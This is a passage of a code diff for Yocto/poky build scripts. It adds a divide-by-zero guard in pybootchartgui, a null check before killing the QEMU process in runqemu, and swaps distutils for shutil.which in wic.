self.recipe_iters[recipe] = self.recipe_store.append([recipe]) diff --git a/poky/scripts/pybootchartgui/pybootchartgui/draw.py b/poky/scripts/pybootchartgui/pybootchartgui/draw.py index 29eb7505bc..fc708b55c3 100644 --- a/poky/scripts/pybootchartgui/pybootchartgui/draw.py +++ b/poky/scripts/pybootchartgui/pybootchartgui/draw.py @@ -267,7 +267,10 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range): # avoid divide by zero if max_y == 0: max_y = 1.0 - xscale = float (chart_bounds[2]) / (max_x - x_shift) + if (max_x - x_shift): + xscale = float (chart_bounds[2]) / (max_x - x_shift) + else: + xscale = float (chart_bounds[2]) # If data_range is given, scale the chart so that the value range in # data_range matches the chart bounds exactly. # Otherwise, scale so that the actual data matches the chart bounds. diff --git a/poky/scripts/runqemu b/poky/scripts/runqemu index 10880ba6bb..51607f10e5 100755 --- a/poky/scripts/runqemu +++ b/poky/scripts/runqemu @@ -1516,7 +1516,8 @@ def main(): def sigterm_handler(signum, frame): logger.info("SIGTERM received") - os.kill(config.qemupid, signal.SIGTERM) + if config.qemupid: + os.kill(config.qemupid, signal.SIGTERM) config.cleanup() # Deliberately ignore the return code of 'tput smam'. subprocess.call(["tput", "smam"]) diff --git a/poky/scripts/wic b/poky/scripts/wic index a741aed364..6547abe0e9 100755 --- a/poky/scripts/wic +++ b/poky/scripts/wic @@ -22,9 +22,9 @@ import sys import argparse import logging import subprocess +import shutil from collections import namedtuple -from distutils import spawn # External modules scripts_path = os.path.dirname(os.path.realpath(__file__)) @@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'): break sdkroot = os.path.dirname(sdkroot) -bitbake_exe = spawn.find_executable('bitbake') +bitbake_exe = shutil.which('bitbake') if bitbake_exe: bitbake_path = scriptpath.add_bitbake_lib_path() import bb |